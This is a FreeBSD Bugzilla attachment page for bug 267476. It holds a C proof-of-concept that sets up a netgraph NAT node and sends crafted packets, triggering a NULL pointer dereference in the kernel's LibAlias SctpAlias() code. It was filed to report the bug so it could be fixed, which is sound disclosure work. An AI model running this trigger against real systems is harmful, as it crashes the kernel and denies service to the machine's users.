FreeBSD Bugzilla – Attachment 237765 Details for
Bug 267476
SctpAlias() can pass a NULL assoc which ProcessSctpMsg() dereferences
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Help
|
New Account
|
Log In
Remember
[x]
|
Forgot Password
Login:
[x]
trigger NULL dereference in kernel LibAlias's SctpAlias()
ng50a.c (text/plain), 1.88 KB, created by
Robert Morris
on 2022-10-31 17:33:25 UTC
(
hide
)
Description:
trigger NULL dereference in kernel LibAlias's SctpAlias()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2022-10-31 17:33:25 UTC
Size:
1.88 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> >#include <netgraph/ng_message.h> >#include <netgraph/ng_socket.h> >#include <netgraph.h> > > >int >main(){ > signal(SIGPIPE, SIG_IGN); > > system("kldload netgraph"); > system("kldload ng_socket"); > system("kldload ng_nat"); > > int cs = -1; > int ds = -1; > NgMkSockNode(NULL, &cs, &ds); > > struct ngm_mkpeer mkp; > memset(&mkp, 0, sizeof(mkp)); > strcpy(mkp.type, "nat"); > strcpy(mkp.ourhook, "xout"); > strcpy(mkp.peerhook, "out"); > > if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, > NGM_MKPEER, &mkp, sizeof(mkp)) < 0) { > fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook); > exit(1); > } > > struct ngm_connect con; > memset(&con, 0, sizeof(con)); > strcpy(con.path, ".:xout"); > strcpy(con.ourhook, "xin"); > strcpy(con.peerhook, "in"); > > if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE, > NGM_CONNECT, &con, sizeof(con)) < 0) { > fprintf(stderr, "netgraph connect %s %s %s failed\n", con.path, con.ourhook, con.peerhook); > exit(1); > } > > struct ngm_name name; > memset(&name, 0, sizeof(name)); > strcpy(name.name, "nat0"); > if(NgSendMsg(cs, ".:xout", NGM_GENERIC_COOKIE, > NGM_NAME, &name, sizeof(name)) < 0){ > perror("NgSendMsg NGM_NAME"); > exit(1); > } > > system("ngctl msg nat0: setaliasaddr 5.5.5.5"); > > { > static char buf[128]; > memset(buf, 0, sizeof(buf)); > *(long long *)(buf + 0) = 0x2000003c000040; > *(long long *)(buf + 8) = 0x8400; > NgSendData(ds, "xout", (unsigned char *)buf, sizeof(buf)); > } > { > static char buf[128]; > memset(buf, 0, sizeof(buf)); > NgSendData(ds, "xin", (unsigned char *)buf, sizeof(buf)); > } >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=237765">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 267476
: 237765